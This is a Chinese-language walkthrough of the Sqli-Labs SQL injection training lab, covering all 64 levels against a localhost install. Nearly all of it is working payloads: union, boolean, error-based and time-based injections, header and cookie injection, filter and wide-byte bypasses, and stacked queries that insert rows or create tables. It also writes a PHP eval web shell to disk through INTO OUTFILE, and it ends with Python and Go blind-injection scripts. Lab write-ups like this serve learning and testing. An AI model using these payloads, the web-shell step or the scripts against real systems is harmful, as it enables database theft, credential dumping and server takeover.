MySql DB Sql注入

List [CTL]

MYSQL Sql Injection

Sqli-Labs

常用函数

version()——MySQL 版本

user()——数据库用户名

current_user——当前用户名

database()——数据库名

@@datadir——数据库路径

@@version_compile_os——操作系统版本

into outfile——写入文件，select '一句话木马' into outfile "/var/www/html/test.php"

数据库插入语句：insert into [table] values(a,b,c);

删除语句：delete from [table] where id=1;

drop database [datebase];，drop table [table];，alter table [table] drop column [column];

修改：update [table] set [column] = 'abc' where id =1;

concat(str1,str2,…)——无分隔符地连接字符串

concat_ws(separator,str1,str2,…)——含有分隔符地连接字符串

group_concat(group SEPARATOR ‘;’ )——连接一组字符串，后可加GROUP BY

extractvalue() 从xml中提取数据

盲注

length()

mid(str,n,m) 从str的第n个数开始提取m个 //与vb的mid()函数相同

substr(str,n,m) 从str的第n个数开始提取m个

left(str,n) 从左开始提取n个 //与vb的left()函数相同

ord() 字符=>ascii //与python的ord()函数相同

ascii() 同ord()

Time-Based

BENCHMARK(count,func())

sleep()

if(a,t,f) //同a?t:f

Wrong-Based

使用group by对rand()函数操作时会返回duplicate key error

rand(int) //以int为种子生成伪随机数

floor() //向下取整

count() //统计个数

and extractvalue(1, concat(0x25, (select table_name from information_schema.tables limit 1)));
and 1=(updatexml(1,concat(0x25,(select user())),1))
and(select 1 from(select count(),concat((select (select (select concat(0x25,(select username from users where id=1),0x25))) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)#
and select * from(select * from table a join table b)as c
select ST_LatFromGeoHash((select group_concat(flag) from flag));

正则注入

Mysql中的RE和大多数编程语言中的相同，不赘述

select user() regexp '^[a-z]' 正确时返回1，错误返回0

select * from * where id =1 and 1=(user() regexp '^[a-z]{4}')

regexp可替换为like

操作文件

and (select count(*) from mysql.user)>0 //返回正常说明有读取权限

select * INTO OUTFILE 'file_name' //写入文件，文件不能存在

爆数据库 select schema_name from information_schema.schemata

爆某库的数据表 select table_name from information_schema.tables where table_schema=’xxxxx’

爆某表的所有列 select column_name from information_schema.columns where table_name=’xxxxx’

获取某列的内容 select xx_column from xx_table

列出所有的数据库 select group_concat(schema_name) from information_schema.schemata

列出某个库当中所有的表 select group_concat(table_name) from information_schema.tables where table_schema='xxxxx'

系统数据库——information_schema，包含所有数据库相关信息

information_schema.schemata中schema_name列，字段为所有库名

information_schema.tables中table_name列对应数据库所有表名，与table_schema列对应

information_schema.columns同理，column_name与table_schema和table_name对应

Less-1

首先Please input the ID as parameter with numeric value，param的形式查询字符串为id

id=1闭合单引号报错You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

添加注释使用order by查列数，此处order by为：ORDER BY column1 [ASC|DESC], column2 [ASC|DESC],...，为指定以某一列为key进行排序，通过尝试可以得出列数。这里经尝试为3列

接着进行联合注入，通过回显爆出表名，列名，字段。这里查询时需要将id查询结果限定为空集，第二个查询结果才能显示出来

爆数据库 http://localhost/sqli/less-1/?id=-1' union select 1,group_concat(schema_name),concat_ws(';',schema_name) from information_schema.schemata--+

爆当前security数据库的表 http://localhost/sqli/less-1/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

爆user表的列 http://127.0.0.1/sqli/less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

爆数据 http://127.0.0.1/sqli/less-1/?id=-1' union select 1,concat_ws(';',username,password),3 from users where id=1--+

Less-2

在查询字符串id值设为1

接着添加单引号，报错为You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1

可知单引号影响了闭合，为传入整数查询

后续注入内容与Less-1相同：表-列-值

Less-3

查询id=1，加单引号，报错为syntax to use near ''1'') LIMIT 0,1' at line 1，猜测后台查询语句为select * from * where id = ('$id') LIMIT 0,1

接着只需构造payload为http://127.0.0.1/sqli/less-3/?id=-1') union select 1,database(),3--+ ，后续注入同Less-1和Less-2

Less-4

提交id=1，添加单引号页面正常，添加双引号报错为syntax to use near '"1"") LIMIT 0,1' at line 1，猜测后台查询语句为select * from * where id = ("$id") LIMIT 0,1

构造payload为http://127.0.0.1/sqli/less-3/?id=-1") union select 1,database(),3--+，后续注入同上

Less-5

提交id=1，显示u are in，知需要盲注

加单引号报错，知闭合为单引号

接下来可以构造payload进行基于bool的盲注

http://127.0.0.1/sqli/less-5/?id=1' and mid(database(),1,1)='s'--+，库名security第一位为’s’，假如猜错则会无回显

慢慢试吧，写个脚本更方便

Bool-Based http://127.0.0.1/sqli/less-5/?id=1' and mid((select group_concat(schema_name) from information_schema.schemata),1,1)>'b'--+

http://127.0.0.1/sqli/less-5/?id=1' and mid((select table_name from information_schema.tables where table_schema='security' LIMIT 0,1),1,1)>'b'--+

http://127.0.0.1/sqli/less-5/?id=1' and mid((select column_name from information_schema.columns where table_name='users' LIMIT 0,1),1,1)>'b'--+

http://127.0.0.1/sqli/less-5/?id=1' and mid((select(username) from security.users where id=1),1,1)>'b'--+

Wrong-Based http://127.0.0.1/sqli/less-5/?id=1' and(select 1 from(select count(*),concat((select (select (select concat(0x25,version(),0x25))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

http://127.0.0.1/sqli/less-5/?id=1' union select 1,count(*),concat(0x25,database(),0x25,floor(rand(0)*2))a from information_schema.tables group by a--+

http://127.0.0.1/sqli/less-5/?id=1' union select 1,count(*),concat(0x25,(select schema_name from information_schema.schemata limit 0,1),0x25,floor(rand(0)*2))a from information_schema.schemata group by a--+

http://127.0.0.1/sqli/less-5/?id=1' union select 1,count(*),concat(0x25,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x25,floor(rand(0)*2))a from information_schema.tables group by a--+

这里修改LIMIT n，1即可遍历

Time-Based http://127.0.0.1/sqli/less-5/?id=1' and if(ascii(mid(database(),1,1))=96,1,sleep(5))--+

http://127.0.0.1/sqli/less-5/?id=1' and if((ascii(mid((select schema_name from information_schema.schemata limit 0,1),1,1))=ascii('i')),1,sleep(5))--+

Less-6

上一关的单引号改为双引号闭合，其余完全相同，采用延时注入

http://127.0.0.1/sqli/less-6/?id=1" and if(ascii(mid((select schema_name from information_schema.schemata limit 0,1),1,1))=ascii('i'),1,sleep(5))--+

http://127.0.0.1/sqli/less-6/?id=1" and if(ascii(mid((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=ascii('e'),1,sleep(5))--+

http://127.0.0.1/sqli/less-6/?id=1" and if(ascii(mid((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1))=ascii('u'),1,sleep(5))--+

http://127.0.0.1/sqli/less-6/?id=1" and if(ascii(mid((select concat(username,0x25,password) from users where id=1 limit 0,1),1,1))=ascii('D'),1,sleep(5))--+

http://127.0.0.1/sqli/less-6/?id=1" and if(ascii(mid((select concat(username,0x25,password) from users where id=1 limit 0,1),5,1))=ascii('%'),1,sleep(5))--+

Less-7

首先判断参数提交为((‘$id’))，接着提示需要use outfile

http://127.0.0.1/sqli/less-7/?id=1 and (select count(*) from mysql.user)>0--+返回正常，说明有写入权限

查询列 http://127.0.0.1/sqli/less-7/?id=1')) union select 1,2,(username from users where id=1) into outfile "D:\\phpStudy\\WWW\\sqli\\Less-7\\qqq.php"--+

读取文件并写入 http://127.0.0.1/sqli/less-7/?id=1')) union select 1,2,load_file('D:\\phpStudy\\WWW\\phpinfo.php') into outfile "D:\\phpStudy\\WWW\\sqli\\Less-7\\aaa.txt"

写入webshell，拿菜刀连接 http://127.0.0.1/sqli/less-7/?id=1')) union select 1,2,'<?php eval($_POST["dump"]) ?>' into outfile "D:\\phpStudy\\WWW\\sqli\\Less-7\\qqq.php"--+

Less-8

提交?id=' or 1=1--+，知为单引号闭合

多说一点，我发现Mysql或者是后端php中，认为两个单引号等同于一个双引号，这里提交?id="' or 1=1--+也会返回正常

知道如何闭合后采取延时注入或布尔注入就可以了，报错注入这一关源码中设置不回显报错

http://127.0.0.1/sqli/less-8/?id=1' and ascii(mid((select password from users where id=1),1,1))=ascii('a')--+

Less-9

页面标题，延时注入，单引号闭合

不太能理解这源码闭合的问题，这里单引号双引号闭合都不会报错。但在注入时双引号返回错误

http://127.0.0.1/sqli/less-9/?id=1' and if(ascii(mid((select password from users where id=1),1,1))=ascii('a'),sleep(5),1)--+

Less-10

页面标题，延时，双引号

http://127.0.0.1/sqli/less-10/?id=1" and if(ascii(mid((select password from users where id=1),1,1))=ascii('a'),sleep(5),1)--+

Less-11

这一关为post注入，查看源代码 @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

构造万能语句 admin' or '1'='1，密码随意填写，可看到登录成功

或者admin' and 1=1#

只需要注意这里要使用#注释

Less-12

闭合为(“$user”)，故构造payload为admin") or 1=1#

Less-13

闭合为(‘$user’)，payload：admin') or 1=1#

Less-14

闭合为”$id”，payload：admin" or 1=1#

当然也可以进行盲注

Less-15

本关发现加单引号或双引号都没有报错回显，说明只能靠猜了

uname=admin' and mid(database(),1,8)='security'#&passwd=a&submit=Submit

uname=admin' and mid((select password from security.users where id=1),1,1)='a'#&passwd=a&submit=Submit

Less-16

页面标题提示为Time-Based

一样没有报错回显，经测试为(“$id”)闭合

构造payload：uname=admin") and if(ascii(mid((select username from security.users where id=1),1,1))=ascii('D'),sleep(5),1)#&passwd=a&submit=Submit

Less-17

进入页面提示为PASSWORD RESET，为重置密码界面，从密码框尝试注入

这里对于username表单进行了过滤：

function check_input($value)
	{
	if(!empty($value))
		{
		// truncation (see comments)
		$value = substr($value,0,15);
		}

		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())
			{
			$value = stripslashes($value);
			}

		// Quote if not a number
		if (!ctype_digit($value))
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
		
	else
		{
		$value = intval($value);
		}
	return $value;
	}

为单引号闭合

提交的sql语句为@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1"; $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";

这一关注入时不能对users表进行查询，不然会报You can't specify target table 'users' for update in FROM clause错误，原因是不能在同一语句中先select再update

所以这个语句会报错uname=admin&passwd=a' and if(mid((select username from users where id=1),1,1)='D',sleep(5),1)#&submit=Submit

而且我发现提交payload上去本地服务器就挂掉了，且user表中password列都被修改为0，记下这个坑。而且这里的问题会影响后面的请求头注入，US，cookie之类的无法echo到页面，需要初始化数据库

采用报错注入

uname=admin&passwd=11'and(select 1 from(select count(*),concat((select (select (select concat(0x25,(select username from users where id=1),0x25))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&submit=Submit

Less-18

进入页面看见显示了IP ADDR，知需要http header注入，使用BurpSuite修改请求头

使用extractvalue函数进行报错注入，针对UA进行注入，按理修改x-forwarder-for也可以注入，但这一关作者好像只希望通过UA注入

'and(select 1 from(select count(*),concat((select (select (select concat(0x25,(select username from users where id=1),0x25))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

Less-19

这一关修改referer，说到referer，据说当时修订http协议的那人拼错了单词，然后就将错就错一直拼成referer….

Less-20

看页面标题为Cookie注入

Burp修改Cookie为uname=admin'and(select 1 from(select count(*),concat((select (select (select concat(0x25,(select username from users where id=1),0x25))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

Less-21

这关对payload进行了b64编码，且闭合为(‘$uname’)

uname=admin'and(select 1 from(select count(*),concat((select (select (select concat(0x25,(select username from users where id=1),0x25))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

uname=YWRtaW4nYW5kKHNlbGVjdCAxIGZyb20oc2VsZWN0IGNvdW50KCopLGNvbmNhdCgoc2VsZWN0IChzZWxlY3QgKHNlbGVjdCBjb25jYXQoMHgyNSwoc2VsZWN0IHVzZXJuYW1lIGZyb20gdXNlcnMgd2hlcmUgaWQ9MSksMHgyNSkpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj

Less-22

同Less-21，闭合改为”$uname”

Less-23

单引号闭合，过滤了注释符

通过联合查询语句闭合单引号构造payload

http://127.0.0.1/sqli/less-23/?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),'3

http://127.0.0.1/sqli/less-23/?id=-1' union select 1,(select username from security.users where id=2),'3

Less-24

这一关index页面为注册账号并登录

通过查看pass_change.php的源码，登录后修改密码的sql语句为: $sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

通过注册用户名为admin'#的账号，修改密码时sql语句会变成： $sql = "UPDATE users SET PASSWORD='123' where username='admin'#' and password='$curr_pass' ";

sql语句执行后，admin账户密码被修改

Less-25

可知过滤掉了or && and

http://127.0.0.1/sqli/less-25/?id=-1' union select 1,database(),3--+

如何绕过字符过滤：

编码
&&和
内联注释/**/
重复写入

其实这一关直接联合查询是不需要管转义的

http://127.0.0.1/sqli/less-25/?id=-1' union select 1,(select passwoorrd from users where id=2),3--+

因为password中的or被过滤，所以需写为passwoorrd

报错注入使用extractvalue

http://127.0.0.1/sqli/less-25/?id=1' || extractvalue(1,concat(0x25,(select passwoorrd from users where id=1)))--+

Less-25a

这一关id为加引号，同Less-25

http://127.0.0.1/sqli/less-25a/?id=-1 union select 1,(select passwoorrd from users where id=2),3--+

Less-26

这一关为过滤空格与注释，而且前一关的and && or也被注释

用以下方式绕过： |Hex|含义| |—-|——-| |%09| TAB 键（水平）| |%0a| 新建一行| |%0c| 新的一页| |%0d| return 功能| |%0b| TAB 键（垂直）| |%a0| 空格|

http://127.0.0.1/sqli/less-26/?id=1'%0aunion%0aselect%0a1,database(),'3

Less-26a

同上一关，闭合为(‘$id’)

Less-27

这一关过滤了union和select加上前一关的字符

http://127.0.0.1/sqli/less-27/?id=0'%0aununionion%0aseLect%0a1,(seLect%0apassword%0afrom%0ausers%0awhere%0aid=2),'3

Less-27a

闭合改为(“$id”)

Less-28

跟前面基本没区别，闭合为(‘$id’)

Less-28a

同上

Less-29

没看懂哪里有WAF，可能是我本地配置有问题

http://127.0.0.1/sqli/less-29/?id=0' union select 1,(select password from users where id=3),3--+

看别人的wp是需要参数污染，提交两个id，提供反向代理的服务器解析第一个id，提供web服务的服务器解析第二个，WAF过滤只处理第一个参数

Less-30

同上

http://127.0.0.1/sqli/less-30/?id=0" union select 1,user(),3--+

Less-31

http://127.0.0.1/sqli/less-31/?id=0") union select 1,(select password from users where id=3),3--+

Less-32

这一关开始是宽字节注入

所谓宽字节就是用两个以上字节表示的，如utf-8编码和GBK编码，不同与ascii的一个字节0-128。在对引号进行过滤时，会添加转义符，urlencode为%5c%27，此时添加%df，%df%5c组成unicode汉字

http://127.0.0.1/sqli/less-32/?id=0%df%27 union select 1,database(),3--+

Less-33

跟上一关一模一样

http://127.0.0.1/sqli/less-32/?id=0%df%27 union select 1,database(),3--+

Less-34

post注入，经尝试uname和passwd都存在单引号过滤。post注入中无法使用URL Encoding的方式绕过，这里使用单引号的utf-16/utf-32编码绕过

uname=� ' or 1=1#&passwd=1

Less-35

id并未被闭合，不需要考虑引号过滤

http://127.0.0.1/sqli/less-35/?id=0 union select 1,database(),3--+

Less-36

单引号闭合 http://127.0.0.1/sqli/Less-36/?id=-1%df%27 union select 1,user(),3--+

Less-37

同34关

uname=� ' or 1=1#&passwd=1

Less-38

堆叠注入stacked-injection

注入多条Sql语句，分号分割，同C语言单行多条语句

payload: http://127.0.0.1/sqli/Less-38/?id=1';insert into users(id,username,password) values('40','Ivan','Ivan')--+

还可以进行drop database，update password等操作

Less-39

同上一关，id不闭合

http://127.0.0.1/sqli/Less-38/?id=1;insert into users(id,username,password) values('40','Ivan','Ivan')--+

Less-40

(‘$id’)闭合

http://127.0.0.1/sqli/Less-38/?id=1');insert into users(id,username,password) values('40','Ivan','Ivan')--+

Less-41

同Less-39，id不闭合，无错误回显

Less-42

post注入，查看源码发现uname进行了过滤，故对passwd进行注入

passwd： a';create table ooo like users;

Less-43

同Less-42，闭合为(‘$id’)

Less-44

单引号闭合，无报错回显，同Less-42

Less-45

同Less-43，无报错回显

Less-46

order by注入

参数提交?sort=1 desc/?sort=1 asc，如果返回结果不同则可以进行注入。rand(true)与rand(false)返回结果不同，可以进行基于布尔的注入。还可以?sort=1 and [payload]进行报错注入或延时注入

报错注入payload： http://127.0.0.1/sqli/Less-46/?sort=1 and extractvalue(1,concat(0x25,(select password from users where id=3)))

Less-47

sort参数变为字符型，前闭合后注释就ok

http://127.0.0.1/sqli/Less-47/?sort=1' and extractvalue(1,concat(0x25,(select password from users where id=3)))--+

Less-48

这一关无报错回显，使用延时注入

http://127.0.0.1/sqli/Less-48/?sort=1 and if(mid(database(),1,1)='s',sleep(5),1)--+

Less-49

同Less-47，无报错回显，延时注入

http://127.0.0.1/sqli/Less-49/?sort=1' and if(mid(database(),1,1)='s',sleep(5),1)--+

Less-50

order by注入与堆叠注入

http://127.0.0.1/sqli/Less-50/?sort=1;create table aaa like users

Less-51

同上，单引号闭合

http://127.0.0.1/sqli/Less-50/?sort=1';create table aaa like users--+

Less-52

同Less-50，payload完全相同

Less-53

同Less-51,payload完全相同

Less-54

从这一关开始进行实战注入，限制十次尝试机会，且每次的表名列名字段名随机

payload依次为：

http://127.0.0.1/sqli/less-54/index.php?id=1'

http://127.0.0.1/sqli/less-54/index.php?id=1' order by 3--+

http://127.0.0.1/sqli/less-54/index.php?id=1' order by 4--+

http://127.0.0.1/sqli/less-54/index.php?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='CHALLENGES'--+

爆出表名为p08ie9rpnc

http://127.0.0.1/sqli/less-54/index.php?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='p08ie9rpnc'--+

爆出列名为id,sessid,secret_1A88,tryy

http://127.0.0.1/sqli/less-54/index.php?id=-1' union select 1,group_concat(secret_1A88),3 from p08ie9rpnc--+

爆出secret key并提交YsQHctIhjx2pxHXeva7di5dj

英语不好是真惨，看不懂上面的字还以为红色是注入失败了…

Less-55

闭合为($id)，猜闭合就会花很多次

http://127.0.0.1/sqli/less-55/?id=0) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='CHALLENGES'--+

http://127.0.0.1/sqli/less-55/?id=0) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='zyx0hgi9h3'--+

http://127.0.0.1/sqli/less-55/?id=0) union select 1,group_concat(secret_72LK),3 from zyx0hgi9h3--+

Less-56

闭合为(‘$id’)

http://127.0.0.1/sqli/less-56/?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='CHALLENGES'--+

http://127.0.0.1/sqli/less-56/?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='go1rv0brdo'--+

http://127.0.0.1/sqli/less-56/?id=0') union select 1,group_concat(secret_LJOZ),3 from go1rv0brdo--+

Less-57

双引号闭合

http://127.0.0.1/sqli/less-57/?id=0" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='CHALLENGES'--+

http://127.0.0.1/sqli/less-57/?id=0" union select 1,group_concat(column_name),3 from information_schema.columns where table_name='hxf6ijm27v'--+

http://127.0.0.1/sqli/less-57/?id=0" union select 1,group_concat(secret_T011),3 from hxf6ijm27v--+

Less-58

联合查询无回显，且限制次数只有五次，需要报错注入

http://127.0.0.1/sqli/less-58/?id=1' and extractvalue(1,concat(0x25,(select table_name from information_schema.tables where table_schema='CHALLENGES'),0x25))--+

http://127.0.0.1/sqli/less-58/?id=1' and extractvalue(1,concat(0x25,(select column_name from information_schema.columns where table_name='pg5r7v7b4r' limit 2,1),0x25))--+

http://127.0.0.1/sqli/less-58/?id=1' and extractvalue(1,concat(0x25,(select secret_LQOC from pg5r7v7b4r),0x25))--+

Less-59

id无闭合，同上一关

http://127.0.0.1/sqli/less-59/?id=1 and extractvalue(1,concat(0x25,(select table_name from information_schema.tables where table_schema='CHALLENGES')))--+

http://127.0.0.1/sqli/less-59/?id=1 and extractvalue(1,concat(0x25,(select column_name from information_schema.columns where table_name='sd9a8g0soe' limit 2,1),0x25))--+

http://127.0.0.1/sqli/less-59/?id=1 and extractvalue(1,concat(0x25,(select secret_DVPW from sd9a8g0soe),0x25))--+

Less-60

(“$id”)闭合

http://127.0.0.1/sqli/less-60/?id=1") and extractvalue(1,concat(0x25,(select table_name from information_schema.tables where table_schema='CHALLENGES'),0x25))--+

http://127.0.0.1/sqli/less-60/?id=1") and extractvalue(1,concat(0x25,(select column_name from information_schema.columns where table_name='xo7c1hm38d' limit 2,1),0x25))--+

http://127.0.0.1/sqli/less-60/?id=1 and extractvalue(1,concat(0x25,(select secret_YJII from xo7c1hm38d),0x25))--+

Less-61

闭合为((‘$id’))

http://127.0.0.1/sqli/less-61/?id=1')) and extractvalue(1,concat(0x25,(select table_name from information_schema.tables where table_schema='CHALLENGES'),0x25))--+

http://127.0.0.1/sqli/less-61/?id=1')) and extractvalue(1,concat(0x25,(select column_name from information_schema.columns where table_name='gfmtwwxgwf'),0x25))

http://127.0.0.1/sqli/less-61/?id=1')) and extractvalue(1,concat(0x25,(select secret_4KX6 from gfmtwwxgwf),0x25))--+

Less-62

看到这个次数我是绝望的

进行延时注入：

脚本：

import requests,string

payload = string.lowercase+string.digits
lenth = 0
result = ''

for i in range(1,15):
    try:
        url = "http://127.0.0.1/sqli/less-62/?id=1') and if(length((select table_name from information_schema.tables where table_schema='CHALLENGES'))='"+str(i)+"',sleep(5),1)--+"
        r = requests.get(url, timeout=5)
    except:
        lenth = i
        break
    
for i in range(1, lenth+1):
    for j in payload:
        try:
            url = "http://127.0.0.1/sqli/less-62/?id=1') and if(mid((select table_name from information_schema.tables where table_schema='CHALLENGES'),"+str(i)+",1)='"+str(j)+"',sleep(5),1)--+"
            r = requests.get(url,timeout=5)
        except:
            result += str(j)
            break
    print result

Golang时间盲注：

利用goroutine来快速注入

package main

import (
	"fmt"
	"time"

	"github.com/eddieivan01/nic"
)

var flag = [32]byte{}

func display() {
	for {
		time.Sleep(time.Duration(1) * time.Second)
		fmt.Println(string(flag[:]))
	}
}

func main() {
	payload := `select flag from flag`
	var url string
	for i := 1; i < 30; i++ {
		go func(i int) {
			for _, j := range []byte("{}qwertyuioplkjhgfdsazxcvbnm098764321_") {
				url = fmt.Sprintf("http://127.0.0.1/sqli/Less-1/?id=1' and if(mid((%s),%d,1)='%v',sleep(3),0)-- -", payload, i, string(j))
				_, err := nic.Get(url, &nic.H{
					Timeout: 3,
				})
				if err != nil {
					flag[i-1] = byte(j)
					return
				}
			}
		}(i)
	}
	display()
}

λ go run time-based.go


    {
    {
    {                       }
    { q                     }
    { q                     }
    { q     e           e  e}
    { q     e           e  e}
    { q     e t         e  e}
    { q     e t         e  e}
    { q     e t         e  e}
    { q  i  e ti        e  e}
    { q  i  e tio       e  e}
    { q  i  e tio       e  e}
 l  { ql i  e tio     lle  e}
 l  { ql i  e tio     lle  e}
 l  { ql i je tio     lle  e}
 l  { ql i je tio   h lle  e}
 l g{ ql i je tio   h lle ge}
fl g{ ql i je tio   h lle ge}
fl g{ ql i je tio   h lle ge}
fl g{sql i je tio   h lle ge}
flag{sql i je tio   halle ge}
flag{sql i je tio   halle ge}
flag{sql i je tio   halle ge}
flag{sql i jectio  challe ge}
flag{sql i jectio  challe ge}
flag{sql i jectio  challe ge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql_injection_challenge}
flag{sql_injection_challenge}

Less-63

单引号闭合，同上关脚本

Less-64

(“$id”)闭合，同上上关脚本

前前后后花了大概半个月刷完了sqli-labs，对于Mysql数据库的注入算初窥门径，对于MSSql，Oracle或是MongoDB等nosql型数据库还需学习积累经验。继续学习吧！

MySql DB Sql注入

List [CTL]

MYSQL Sql Injection

end